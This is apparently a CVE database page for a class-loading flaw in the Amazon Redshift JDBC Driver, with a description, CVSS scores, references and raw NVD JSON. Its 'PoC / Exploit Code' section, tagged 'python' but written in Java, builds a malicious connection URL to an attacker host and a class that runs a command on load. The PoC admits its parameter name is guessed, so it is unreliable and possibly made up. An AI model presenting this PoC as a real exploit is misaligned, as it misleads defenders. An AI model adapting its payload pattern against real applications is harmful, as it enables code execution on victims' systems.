CVE-2026-8178

Description

An issue exists in Amazon Redshift JDBC Driver versions prior to 2.2.2. Under certain conditions, the driver could load and execute arbitrary classes when processing JDBC connection URL parameters. An actor who can influence the connection URL could potentially execute code in the application context, provided a suitable class is available on the application's classpath. To mitigate this issue, users should upgrade to version 2.2.2 or later.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Amazon Redshift JDBC Driver < 2.2.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import java.sql.*;

public class CVE20268178PoC {
    public static void main(String[] args) {
        // The vulnerable driver accepts a parameter to load arbitrary classes.
        // This PoC demonstrates the structure of a malicious JDBC URL.
        // Note: The specific parameter name (e.g., 'pluginClass', 'factory') depends on the driver implementation.
        
        String maliciousUrl = "jdbc:redshift://attacker-controlled-host:5439/db?customClassLoader=com.evil.MaliciousClass";
        String user = "user";
        String pass = "password";

        try {
            // The vulnerability triggers during connection establishment
            // when the driver parses the URL and attempts to load the specified class.
            Connection conn = DriverManager.getConnection(maliciousUrl, user, pass);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

// The malicious class that must exist on the target's classpath.
class MaliciousClass {
    static {
        // Code execution payload
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8178
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8178
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8178/
[4] VulDB https://vuldb.com/cve/CVE-2026-8178
[5] https://aws.amazon.com/security/security-bulletins/2026-028-aws/
[6] https://github.com/aws/amazon-redshift-jdbc-driver/releases/tag/v2.2.2
[7] https://github.com/aws/amazon-redshift-jdbc-driver/security/advisories/GHSA-wmmv-vvg5-993q

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8178", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2026-05-08T19:16:31.827", "lastModified": "2026-05-12T14:13:03.510", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue exists in Amazon Redshift JDBC Driver versions prior to 2.2.2. Under certain conditions, the driver could load and execute arbitrary classes when processing JDBC connection URL parameters. An actor who can influence the connection URL could potentially execute code in the application context, provided a suitable class is available on the application's classpath.\n\n\n\nTo mitigate this issue, users should upgrade to version 2.2.2 or later."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-470"}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/2026-028-aws/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/amazon-redshift-jdbc-driver/releases/tag/v2.2.2", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/amazon-redshift-jdbc-driver/security/advisories/GHSA-wmmv-vvg5-993q", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}}